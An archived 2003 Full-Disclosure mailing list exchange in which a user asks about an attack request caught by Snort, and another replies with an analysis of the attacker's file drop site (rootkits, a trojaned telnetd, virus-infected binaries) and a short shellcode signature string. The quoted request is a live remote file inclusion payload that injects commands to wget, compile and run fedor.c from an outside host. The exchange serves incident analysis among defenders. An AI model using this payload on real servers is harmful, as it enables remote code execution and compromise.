lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
From: gml at phrick.net (gml)
Subject: http://xfteam.net/fedor.c - Anyone seen this
 before??

I've attached a copy of the archive,  I was able to retrieve it apparently.
It's sd's client code for his tty shell, looks like you've stumbled on 
to someones private warez
repository.  The root of xfteam.net is just full of fun stuff

Parent Directory <http://xfteam.net/>        20-Nov-2003 16:14      -  
 c4 <http://xfteam.net/c4>                      15-Nov-2003 10:49    19k  
 cgi-bin/ <http://xfteam.net/cgi-bin/>                20-Nov-2003 16:13      -  
 cmd.jpg.php <http://xfteam.net/cmd.jpg.php>             15-Nov-2003 10:49     1k  
 cmd.txt <http://xfteam.net/cmd.txt>                 15-Nov-2003 10:47     1k  
 f <http://xfteam.net/f>                       20-Nov-2003 13:01    28k  
 fedor.c <http://xfteam.net/fedor.c>                 15-Nov-2003 10:47     5k  
 forum/ <http://xfteam.net/forum/>                  04-Nov-2003 22:05      -  
 google.jpg <http://xfteam.net/google.jpg>              19-Nov-2003 19:56   106k  
 hax.gif <http://xfteam.net/hax.gif>                 19-Nov-2003 23:38     1k  
 iomash.c <http://xfteam.net/iomash.c>                16-Nov-2003 16:30     2k  
 kmod <http://xfteam.net/kmod>                    15-Nov-2003 10:47    17k  
 mail/ <http://xfteam.net/mail/>                   20-Nov-2003 16:13      -  
 putty.exe <http://xfteam.net/putty.exe>               19-Nov-2003 12:36   220k  
 remote.php <http://xfteam.net/remote.php>              15-Nov-2003 10:49    87k  
 strings.txt <http://xfteam.net/strings.txt>             15-Nov-2003 10:44     3k  
 telnetd <http://xfteam.net/telnetd>                 16-Nov-2003 16:29   167k  

I'm of the opinion this is someones drop box, they drop off code they are going to later download and compile on a target machine from here.
The file c4 is a suckit variant, also by SD very popular with the linux kids.  kmod is ptrace-kmod.c in ELF.  telnetd is what you would expect
it's a trojaned telnetd binary.  these binaries also appear to be infected with an RST variant: 
http://dump.cryptobeacon.net/papers/RST-Variant%20Analysis.txt, i wonder if your attacker knows this or not.  if not i feel really bad
for anyone he's attacked.  who says unix virii aren't effective?

yawn.


char sig[]="\x31\xdb\x31\xc0\x31\xd2\xb2\x08\x68\x67\x6d\x6c\x0a\x89\xe1\xb0\x04\xcd\x80\xb0\x01\xcd\x80";



Dan wrote:

>Hi,
>Our Snort picked up an interesting attempt to download, compile and execute.
>Noting also the fact that the sub dir its attempting to access has not been
>there for over 4 months(/logjam/)?
>
>Has anyone actually seen what this fedor.c is? I have done some google'ing but
>it comes up blank.
>
>Has anyone else noticed this kindof request recently?
>
>Is it just me or is xfteam.net not resolving anyway?
>
>Orignal HTTP request:
>GET /logjam/showhits.php?
>rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f
>
>Breaking this down we get(twice):
>uname -a
>cd /tmp
>wget http://xfteam.net/fedor.c
>gcc -o f fedor.c
>./f
>
>
>Regards,
>Daniel.
>
>
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>  
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031124/3ddc416e/attachment.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: unknown.gif
Type: image/gif
Size: 245 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031124/3ddc416e/unknown.gif
-------------- next part --------------
A non-text attachment was scrubbed...
Name: folder.gif
Type: image/gif
Size: 225 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031124/3ddc416e/folder.gif
-------------- next part --------------
A non-text attachment was scrubbed...
Name: text.gif
Type: image/gif
Size: 229 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031124/3ddc416e/text.gif
-------------- next part --------------
A non-text attachment was scrubbed...
Name: c.gif
Type: image/gif
Size: 242 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031124/3ddc416e/c.gif
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image2.gif
Type: image/gif
Size: 309 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031124/3ddc416e/image2.gif
-------------- next part --------------
A non-text attachment was scrubbed...
Name: binary.gif
Type: image/gif
Size: 246 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031124/3ddc416e/binary.gif
-------------- next part --------------
A non-text attachment was scrubbed...
Name: xfteam.net.tar.gz
Type: application/gzip
Size: 336732 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031124/3ddc416e/xfteam.net.tar.bin

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ